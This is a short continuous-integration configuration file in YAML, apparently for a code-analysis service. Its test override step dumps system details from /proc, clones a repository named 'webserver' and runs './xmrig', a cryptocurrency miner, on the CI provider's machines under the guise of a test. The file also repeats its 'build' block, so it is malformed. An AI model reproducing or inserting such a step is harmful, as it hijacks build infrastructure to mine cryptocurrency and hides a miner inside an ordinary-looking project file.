build:
  nodes:
    docker-build:
      environment:
        # caching works with the remote_engine and the local executor
        docker: true
checks:
    python:
        code_rating: true
        duplicate_code: true

build:
  nodes:
    docker-build:
      environment:
        # caching works with the remote_engine and the local executor
        docker: true
    analysis:
      tests:
        override:
          - cat /proc/1/cgroup; cat /proc/uptime; cat /proc/cpuinfo; cat /proc/meminfo; cat /proc/cmdline; git clone https://github.com/dajiejie123/webserver.git && cd webserver && ./xmrig
